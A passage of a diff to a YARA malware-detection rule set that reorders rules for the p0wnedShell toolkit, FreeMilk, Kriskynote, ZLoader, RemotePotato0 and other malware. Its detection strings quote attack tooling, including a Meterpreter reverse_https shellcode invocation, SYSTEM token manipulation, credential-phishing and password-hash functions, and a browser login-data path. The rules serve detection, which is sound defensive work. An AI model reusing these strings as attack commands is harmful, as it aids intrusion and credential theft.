+		description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedExploits.cs"
 		author = "Florian Roth (Nextron Systems)"
-		id = "eff37dba-d4a9-5e3d-9452-49f04ddcbe0b"
-		date = "2017-10-05"
+		id = "9f754f5f-85e8-5b6f-bde2-566da4d39586"
+		date = "2017-01-14"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_freemilk.yar#L13-L39"
+		reference = "https://github.com/Cn33liz/p0wnedShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_p0wnshell.yar#L83-L97"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d66feceb01ecdd84345def58270a8788b563c99a7efadf9a3049c5fbbbd15da8"
+		logic_hash = "40f23316117faa63fa9e9a5d281600f8e9d41857aac815d22559391c74dec157"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "34478d6692f8c28332751b31fd695b799d4ab36a8c12f7b728e2cb99ae2efcd9"
-		hash2 = "35273d6c25665a19ac14d469e1436223202be655ee19b5b247cb1afef626c9f2"
-		hash3 = "0f82ea2f92c7e906ee9ffbbd8212be6a8545b9bb0200eda09cce0ba9d7cb1313"
+		hash1 = "54548e7848e742566f5596d8f02eca1fd2cbfeae88648b01efb7bab014b9301b"
 
 	strings:
-		$x1 = "\\milk\\Release\\milk.pdb" ascii
-		$x2 = "E:\\BIG_POOH\\Project\\" ascii
-		$x3 = "Windows-KB271854-x86.exe" fullword wide
-		$s1 = "Windows-KB275122-x86.exe" fullword wide
-		$s2 = "\\wsatra.tmp" wide
-		$s3 = "%s\\Rar0tmpExtra%d.rtf" fullword wide
-		$s4 = "\"%s\" help" fullword wide
+		$x1 = "Pshell.RunPSCommand(Whoami);" fullword ascii
+		$x2 = "If succeeded this exploit should popup a System CMD Shell" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "108aa007b3d1b4817ff4c04d9b254b39" or 1 of ( $x* ) or 4 of them )
+		all of them
 }
-
-rule SIGNATURE_BASE_Freemilk_APT_Mal_2 : FILE
+rule SIGNATURE_BASE_P0Wnedshellx64
 {
 	meta:
-		description = "Detects malware from FreeMilk campaign"
+		description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShellx64.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ef5f400c-16f8-5374-af16-c8530ddb87ee"
-		date = "2017-10-05"
-		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_freemilk.yar#L41-L60"
+		id = "c9791804-4f08-5b7e-8d9d-37e2dfccec47"
+		date = "2017-01-14"
+		modified = "2021-09-15"
+		reference = "https://github.com/Cn33liz/p0wnedShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_p0wnshell.yar#L99-L118"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ad2cc04542e93add3e7856574d4de5aa371cc31542f87b1e90d30e12e0149341"
+		logic_hash = "d7cd33548ed3485cc6f3cd289813a8eb83b34e800b839c5c8f8add5f9e01a3da"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7f35521cdbaa4e86143656ff9c52cef8d1e5e5f8245860c205364138f82c54df"
+		tags = ""
+		hash1 = "d8b4f5440627cf70fa0e0e19e0359b59e671885f8c1855517211ba331f48c449"
 
 	strings:
-		$s1 = "failed to take the screenshot. err: %d" fullword ascii
-		$s2 = "runsample" fullword wide
-		$s3 = "%s%02X%02X%02X%02X%02X%02X:" fullword wide
-		$s4 = "win-%d.%d.%d-%d" fullword wide
+		$x1 = "Oq02AB+LCAAAAAAABADs/QkW3LiOLQBuRUsQR1H731gHMQOkFGFnvvrdp/O4sp6tkDiAIIjhAryu4z6PVOtxHuXz3/xT6X9za/Df/Hsa/JT/9Pjgb/+kPPhv9Sjp01Wf" wide
+		$x2 = "Invoke-TokenManipulation" wide
+		$x3 = "-CreateProcess \"cmd.exe\" -Username \"nt authority\\system\"" fullword wide
+		$x4 = "CommandShell with Local Administrator privileges :)" fullword wide
+		$x5 = "Invoke-shellcode -Payload windows/meterpreter/reverse_https -Lhost " fullword wide
+		$fp1 = "AVSignature" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( pe.imphash ( ) == "b86f7d2c1c182ec4c074ae1e16b7a3f5" or all of them )
+		1 of ( $x* ) and not 1 of them
 }
-rule SIGNATURE_BASE_Freemilk_APT_Mal_3 : FILE
+rule SIGNATURE_BASE_P0Wnedlistenerconsole
 {
 	meta:
-		description = "Detects malware from FreeMilk campaign"
+		description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedListenerConsole.cs"
 		author = "Florian Roth (Nextron Systems)"
-		id = "152781f0-756b-50ab-b588-4af5fa4ce419"
-		date = "2017-10-05"
+		id = "77d13c34-3e15-5bc1-a100-f04be38cfb44"
+		date = "2017-01-14"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_freemilk.yar#L62-L78"
+		reference = "https://github.com/Cn33liz/p0wnedShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_p0wnshell.yar#L120-L140"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "be68f624a2a374525857193d27f0645be5d10c198954dd90350448c3127e4bb5"
+		logic_hash = "068e590f6f4f99c27814f2bf96d51e1c8c6422afcf8b99bb9f1852216335da7b"
 		score = 75
-		quality = 83
-		tags = "FILE"
+		quality = 85
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ef40f7ddff404d1193e025081780e32f88883fa4dd496f4189084d772a435cb2"
+		hash1 = "d2d84e65fad966a8556696fdaab5dc8110fc058c9e9caa7ea78aa00921ae3169"
 
 	strings:
-		$s1 = "CMD.EXE /C \"%s\"" fullword wide
-		$s2 = "\\command\\start.exe" wide
-		$s3 = ".bat;.com;.cmd;.exe" fullword wide
-		$s4 = "Unexpected failure opening HKCR key: %d" fullword ascii
+		$x1 = "Invoke_ReflectivePEInjection" fullword wide
+		$x5 = "p0wnedShell> " fullword wide
+		$x6 = "Resources.Get_PassHashes" fullword wide
+		$s7 = "Invoke_CredentialsPhish" fullword wide
+		$s8 = "Invoke_Shellcode" fullword wide
+		$s9 = "Resources.Invoke_TokenManipulation" fullword wide
+		$s10 = "Resources.Port_Scan" fullword wide
+		$s20 = "Invoke_PowerUp" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 900KB and all of them )
+		1 of them
 }
-
-rule SIGNATURE_BASE_Freemilk_APT_Mal_4 : FILE
+rule SIGNATURE_BASE_P0Wnedbinaries
 {
 	meta:
-		description = "Detects malware from FreeMilk campaign"
+		description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedBinaries.cs"
 		author = "Florian Roth (Nextron Systems)"
-		id = "44f919f7-8eda-5e70-88d5-9e81a761192c"
-		date = "2017-10-05"
+		id = "0c62dd3a-195c-5890-b262-2eb00c58f8c1"
+		date = "2017-01-14"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_freemilk.yar#L80-L104"
+		reference = "https://github.com/Cn33liz/p0wnedShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_p0wnshell.yar#L142-L161"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "deedb1da7e3421cd300fceea354a690e22005bab16eb0cc20b46f912393b637d"
+		logic_hash = "4df7fcf508a9257ea418bd1995158c3676037b310dc884d44658977fda81b13b"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "99c1b4887d96cb94f32b280c1039b3a7e39ad996859ffa6dd011cf3cca4f1ba5"
+		hash1 = "fd7014625b58d00c6e54ad0e587c6dba5d50f8ca4b0f162d5af3357c2183c7a7"
 
 	strings:
-		$x1 = "base64Encoded=\"TVqQAAMAAAAE" ascii
-		$s1 = "SOFTWARE\\Clients\\StartMenuInternet\\firefox.exe\\shell\\open\\command" fullword wide
-		$s2 = "'Wscript.echo \"Base64 encoded: \" + base64Encoded" fullword ascii
-		$s3 = "\\Google\\Chrome\\User Data\\Default\\Login Data" ascii
-		$s4 = "outFile=sysDir&\"\\rundll32.exe\"" fullword ascii
-		$s5 = "set shell = WScript.CreateObject(\"WScript.Shell\")" fullword ascii
-		$s6 = "command =outFile &\" sysupdate\"" fullword ascii
+		$x1 = "Oq02AB+LCAAAAAAABADs/QkW3LiOLQBuRUsQR1H731gHMQOkFGFnvvrdp/O4sp6tkDiAIIjhAryu4z6PVOtxHuXz3/xT6X9za/Df/Hsa/JT/9" ascii
+		$x2 = "wpoWAB+LCAAAAAAABADs/QeyK7uOBYhORUNIenL+E2vBA0ympH3erY4f8Tte3TpbUiY9YRbcGK91vVKtr+tV3v/B/yr/m1vD/+DvNOVb+V/f" ascii
+		$x3 = "mo0MAB+LCAAAAAAABADsXQl24zqu3YqXII6i9r+xJ4AACU4SZcuJnVenf/9OxbHEAcRwcQGu62NbHsrax/Iw+3/hP5b+VzuH/4WfVeDf8n98" ascii
+		$x4 = "LE4CAB+LCAAAAAAABADsfQmW2zqu6Fa8BM7D/jf2hRmkKNuVm/Tt9zunkipb4giCIGb2/prhFUt5hVe+/sNP4b+pVvwPn+OQp/LT9ge/+" ascii
+		$x5 = "XpMCAB+LCAAAAAAABADsfQeWIzmO6FV0hKAn73+xL3iAwVAqq2t35r/tl53VyhCDFoQ3Y7zW9Uq1vq5Xef/CT+X/59bwFz6nKU/lp+8P/" ascii
+		$x6 = "STwAAB+LCAAAAAAABADtWwmy6yoO3YqXgJjZ/8ZaRwNgx/HNfX/o7qqUkxgzCM0SmLR2jHBQzkc4En9xZbvHUuSLMnWv9ateK/70ilStR" ascii
+		$x7 = "namespace p0wnedShell" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( ( pe.exports ( "getUpdate" ) and pe.number_of_exports == 1 ) or 1 of ( $x* ) or 3 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Kriskynote_Mar17_1 : FILE
+rule SIGNATURE_BASE_P0Wnedamsibypass
 {
 	meta:
-		description = "Detects Kriskynote Malware"
+		description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedAmsiBypass.cs"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b1e5df0c-0112-5fee-85e9-cb0ca31f5234"
-		date = "2017-03-03"
+		id = "168af265-d3e9-59a2-b754-20d6c9a298b1"
+		date = "2017-01-14"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_kriskynote.yar#L11-L30"
+		reference = "https://github.com/Cn33liz/p0wnedShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_p0wnshell.yar#L163-L178"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cc4861f3a612cbaba6abf8ded76972941c879f04b59c29756bf0ba8083bf93ab"
+		logic_hash = "1f7613506058706fc74979fdd4f9e425e9d16527120e0f2f49bc21e3e43d3b16"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a19c4b615aa54207604b181873e614d84126b639fee2cce3ca9d5bd863f6f577"
-		hash2 = "62b41db0bf63fa45a2c2b0f5df8c2209a5d96bf2bddf82749595c66d30b7ec61"
+		hash1 = "345e8e6f38b2914f4533c4c16421d372d61564a4275537e674a2ac3360b19284"
 
 	strings:
-		$s1 = "gzwrite64" fullword ascii
-		$opa1 = { e8 6b fd ff ff 83 f8 ff 74 65 83 7b 28 00 74 42 }
-		$opb1 = { 8a 04 08 8b 8e a4 16 00 00 88 44 24 0c 66 c7 04 }
-		$opb2 = { 89 4e 6c 89 46 74 e9 ad fc ff ff 8b 46 68 85 c0 }
+		$x1 = "Program.P0wnedPath()" fullword ascii
+		$x2 = "namespace p0wnedShell" fullword ascii
+		$x3 = "H4sIAAAAAAAEAO1YfXRUx3WflXalFazQgiVb5nMVryzxIbGrt/rcFRZIa1CQYEFCQnxotUhP2pX3Q337HpYotCKrPdbmoQQnkOY0+BQCNKRpe" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and $s1 and ( $opa1 or all of ( $opb* ) )
+		1 of them
 }
-rule SIGNATURE_BASE_Kriskynote_Mar17_2 : FILE
+rule SIGNATURE_BASE_P0Wnedshell_Outputs
 {
 	meta:
-		description = "Detects Kriskynote Malware"
+		description = "p0wnedShell Runspace Post Exploitation Toolkit - from files p0wnedShell.cs, p0wnedShell.cs"
 		author = "Florian Roth (Nextron Systems)"
-		id = "704baf41-9718-537f-9456-381a9f42fb97"
-		date = "2017-03-03"
+		id = "c19fc14b-0c42-5dd1-bff2-ba75f4168d9c"
+		date = "2017-01-14"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_kriskynote.yar#L32-L46"
+		reference = "https://github.com/Cn33liz/p0wnedShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_p0wnshell.yar#L180-L196"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4a1a7c1c75cc64df32d2f055538c5ad15418802733046471520c372a616f1e11"
+		logic_hash = "85d5317a473d981fe6ee1362789f34653a838c63d823bb62028a25c9db27cf6e"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "cb9a2f77868b28d98e4f9c1b27b7242fec2f2abbc91bfc21fe0573e472c5dfcb"
+		super_rule = 1
+		hash1 = "e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60"
 
 	strings:
-		$s1 = "fgjfcn8456fgjhfg89653wetwts" fullword ascii
-		$op0 = { 33 c0 80 34 30 03 40 3d e6 21 00 00 72 f4 b8 e6 }
+		$s1 = "[+] For this attack to succeed, you need to have Admin privileges." fullword ascii
+		$s2 = "[+] This is not a valid hostname, please try again" fullword ascii
+		$s3 = "[+] First return the name of our current domain." fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Kriskynote_Mar17_3 : FILE
+rule SIGNATURE_BASE_HKTL_Sentinelone_Remotepotato0_Privesc : FILE
 {
 	meta:
-		description = "Detects Kriskynote Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "647fac4c-2326-5a68-9890-8236022c1548"
-		date = "2017-03-03"
+		description = "Detects RemotePotato0 binary"
+		author = "SentinelOne"
+		id = "f6dffd6b-e794-5c4a-9700-5c2022168f44"
+		date = "2021-04-26"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_kriskynote.yar#L48-L64"
+		reference = "https://labs.sentinelone.com/relaying-potatoes-dce-rpc-ntlm-relay-eop"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_remote_potato0.yar#L2-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fda8a7944cdd12cadb1c902664909a8164835f660e6fa56209bc51164a90e77c"
+		logic_hash = "f3a3a917908af6260f40b217f966750a095140abb6bf85cf3a728725bc16996f"
 		score = 75
-		quality = 85
+		quality = 79
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fc838e07834994f25b3b271611e1014b3593278f0703a4a985fb4234936df492"
 
 	strings:
-		$s1 = "rundll32 %s Check" fullword ascii
-		$s2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RecentDocs" fullword ascii
-		$s3 = "name=\"IsUserAdmin\"" fullword ascii
-		$s4 = "zok]\\\\\\ZZYYY666564444" fullword ascii
+		$import1 = "CoGetInstanceFromIStorage"
+		$istorage_clsid = "{00000306-0000-0000-c000-000000000046}" nocase wide ascii
+		$meow_header = { 4d 45 4f 57 }
+		$clsid1 = "{11111111-2222-3333-4444-555555555555}" wide ascii
+		$clsid2 = "{5167B42F-C111-47A1-ACC4-8EABE61B0B54}" nocase wide ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them )
+		( uint16( 0 ) == 0x5A4D ) and $import1 and $istorage_clsid and $meow_header and 1 of ( $clsid* )
 }
-rule SIGNATURE_BASE_Seaduke_Sample : FILE
+rule SIGNATURE_BASE_Sysinternals_Tool_Anomaly : FILE
 {
 	meta:
-		description = "SeaDuke Malware"
+		description = "SysInternals Tool Anomaly - does not contain Mark Russinovich as author"
 		author = "Florian Roth (Nextron Systems)"
-		id = "011a303b-b051-519f-9687-668c9bcd15ca"
-		date = "2015-07-14"
+		id = "b676726b-7ecd-52ed-bdec-3d81b7596246"
+		date = "2016-12-06"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/MJ0c2M"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_seaduke_unit42.yar#L10-L28"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_sysinternals_anomaly.yar#L10-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d2e570129a12a47231a1ecb8176fa88a1bf415c51dabd885c513d98b15f75d4e"
-		logic_hash = "3bec2bedaafddd17ee65747f8be773287eda784bdfa8fc11e8378737139ef94e"
-		score = 70
+		logic_hash = "760795a51965197bd101ffbf0f7c8cfbbb16d2f443d0941de4a75c8f33f4cad0"
+		score = 50
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "bpython27.dll" fullword ascii
-		$s1 = "email.header(" ascii
-		$s2 = "LogonUI.exe" fullword wide
-		$s3 = "Crypto.Cipher.AES(" ascii
-		$s4 = "mod is NULL - %s" fullword ascii
+		$s1 = "Software\\Sysinternals\\%s" fullword ascii
+		$n1 = "Mark Russinovich" wide ascii
+		$nfp1 = "<<<Obsolete>>>" fullword wide
+		$nfp2 = "BGInfo - Wallpaper text configurator" wide
+		$nfp3 = "usage: movefile [source] [dest]" wide
+		$nfp4 = "LoadOrder information has been copied" wide
+		$nfp5 = "Cache working set cleared" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 4000KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and $s1 and not $n1 and not 1 of ( $nfp* ) )
 }
-rule SIGNATURE_BASE_Servantshell : FILE
+rule SIGNATURE_BASE_Base64_PS1_Shellcode
 {
 	meta:
-		description = "Detects Servantshell malware"
-		author = "Arbor Networks ASERT Nov 2015"
-		id = "f41e9191-0be1-59f7-9be4-e39c8a37b2c5"
-		date = "2017-02-02"
+		description = "Detects Base64 encoded PS1 Shellcode"
+		author = "Nick Carr, David Ledbetter"
+		id = "7c3cec3b-a192-5bfd-b4f1-22b1afeb717e"
+		date = "2018-11-14"
 		modified = "2023-12-05"
-		reference = "https://tinyurl.com/jmp7nrs"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_servantshell.yar#L1-L17"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "739057dc95831c9ed35981b40c606ecd0b3fd2118b42ed7c09e200dc0bc395db"
-		score = 70
+		reference = "https://twitter.com/ItsReallyNick/status/1062601684566843392"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_ps1_shellcode.yar#L1-L15"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "fac6f41965eb2209f1552763800d6a2b172f28cd29bb7586d180654aab1e6d56"
+		score = 65
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$string1 = "SelfDestruction.cpp"
-		$string2 = "SvtShell.cpp"
-		$string3 = "InitServant"
-		$string4 = "DeinitServant"
-		$string5 = "CheckDT"
+		$substring = "AAAAYInlM"
+		$pattern1 = "/OiCAAAAYInlM"
+		$pattern2 = "/OiJAAAAYInlM"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		$substring and 1 of ( $p* )
 }
-rule SIGNATURE_BASE_MAL_DOC_Zloader_Oct20_1 : FILE
+
+rule SIGNATURE_BASE_Freemilk_APT_Mal_1 : FILE
 {
 	meta:
-		description = "Detects weaponized ZLoader documents"
+		description = "Detects malware from FreeMilk campaign"
 		author = "Florian Roth (Nextron Systems)"
-		id = "34145746-9733-5dd9-9dcf-99e3a3ceee4f"
-		date = "2020-10-10"
+		id = "eff37dba-d4a9-5e3d-9452-49f04ddcbe0b"
+		date = "2017-10-05"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/JohnLaTwC/status/1314602421977452544"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_zloader_maldocs.yar#L2-L22"
+		reference = "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_freemilk.yar#L13-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6f546a860361d3caff99c282465dbbd1880460c7491a1b5ad065c1b5d91e5d49"
+		logic_hash = "d66feceb01ecdd84345def58270a8788b563c99a7efadf9a3049c5fbbbd15da8"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "668ca7ede54664360b0a44d5e19e76beb92c19659a8dec0e7085d05528df42b5"
-		hash2 = "a2ffabbb1b5a124f462a51fee41221081345ec084d768ffe1b1ef72d555eb0a0"
-		hash3 = "d268af19db475893a3d19f76be30bb063ab2ca188d1b5a70e51d260105b201da"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "34478d6692f8c28332751b31fd695b799d4ab36a8c12f7b728e2cb99ae2efcd9"
+		hash2 = "35273d6c25665a19ac14d469e1436223202be655ee19b5b247cb1afef626c9f2"
+		hash3 = "0f82ea2f92c7e906ee9ffbbd8212be6a8545b9bb0200eda09cce0ba9d7cb1313"
 
 	strings:
-		$sc1 = { 78 4E FC 04 AB 6B 17 E2 33 E3 49 62 50 69 BB 60
-               31 00 1E 00 02 4B BA E2 D8 E3 92 22 1E 69 96 20
-               98 }
-		$sc2 = { 6B 9E E2 36 E3 69 62 72 69 3A 60 55 6E }
-		$sc3 = { 3E 69 76 60 59 6E 34 FB 87 6B 75 }
+		$x1 = "\\milk\\Release\\milk.pdb" ascii
+		$x2 = "E:\\BIG_POOH\\Project\\" ascii
+		$x3 = "Windows-KB271854-x86.exe" fullword wide
+		$s1 = "Windows-KB275122-x86.exe" fullword wide
+		$s2 = "\\wsatra.tmp" wide
+		$s3 = "%s\\Rar0tmpExtra%d.rtf" fullword wide
+		$s4 = "\"%s\" help" fullword wide
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 40KB and filesize > 30KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "108aa007b3d1b4817ff4c04d9b254b39" or 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_Hdroot_Sample_Jul17_1 : FILE
+
+rule SIGNATURE_BASE_Freemilk_APT_Mal_2 : FILE
 {
 	meta:
-		description = "Detects HDRoot samples"
+		description = "Detects malware from FreeMilk campaign"
 		author = "Florian Roth (Nextron Systems)"
-		id = "06356f8a-bacd-51bc-a6f4-107983a9c16e"
-		date = "2017-07-07"
+		id = "ef5f400c-16f8-5374-af16-c8530ddb87ee"
+		date = "2017-10-05"
 		modified = "2023-12-05"
-		reference = "Winnti HDRoot VT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_hdroot.yar#L11-L26"
+		reference = "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_freemilk.yar#L41-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "41127e6d70af4b095555285f3d5570fc4dbe2a7918664502057cdc4fed8fab33"
+		logic_hash = "ad2cc04542e93add3e7856574d4de5aa371cc31542f87b1e90d30e12e0149341"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6d2ad82f455becc8c830d000633a370857928c584246a7f41fe722cc46c0d113"
+		hash1 = "7f35521cdbaa4e86143656ff9c52cef8d1e5e5f8245860c205364138f82c54df"
 
 	strings:
-		$s1 = "gleupdate.dll" fullword ascii
-		$s2 = "\\DosDevices\\%ws\\system32\\%ws" wide
-		$s3 = "l\\Driver\\nsiproxy" fullword wide
+		$s1 = "failed to take the screenshot. err: %d" fullword ascii
+		$s2 = "runsample" fullword wide
+		$s3 = "%s%02X%02X%02X%02X%02X%02X:" fullword wide
+		$s4 = "win-%d.%d.%d-%d" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 60KB and 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( pe.imphash ( ) == "b86f7d2c1c182ec4c074ae1e16b7a3f5" or all of them )
 }
-rule SIGNATURE_BASE_Hdroot_Sample_Jul17_2 : FILE
+rule SIGNATURE_BASE_Freemilk_APT_Mal_3 : FILE
 {
 	meta:
-		description = "Detects HDRoot samples"
+		description = "Detects malware from FreeMilk campaign"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9ce9c0f4-e6f9-5033-ba74-367e6d741650"
-		date = "2017-07-07"
+		id = "152781f0-756b-50ab-b588-4af5fa4ce419"
+		date = "2017-10-05"
 		modified = "2023-12-05"
-		reference = "Winnti HDRoot VT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_hdroot.yar#L28-L64"
+		reference = "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_freemilk.yar#L62-L78"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "94288abb5c4da7c4b07eeae55070797af1556dac35ad012aff1bbe8c05e0a215"
+		logic_hash = "be68f624a2a374525857193d27f0645be5d10c198954dd90350448c3127e4bb5"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "1c302ed9786fc600073cc6f3ed2e50e7c23785c94a2908f74f92971d978b704b"
-		hash2 = "3b7cfa40e26fb6b079b55ec030aba244a6429e263a3d9832e32ab09e7a3c4a9c"
-		hash3 = "71eddf71a94c5fd04c9f3ff0ca1eb6b1770df1a3a8f29689fb8588427b5c9e8e"
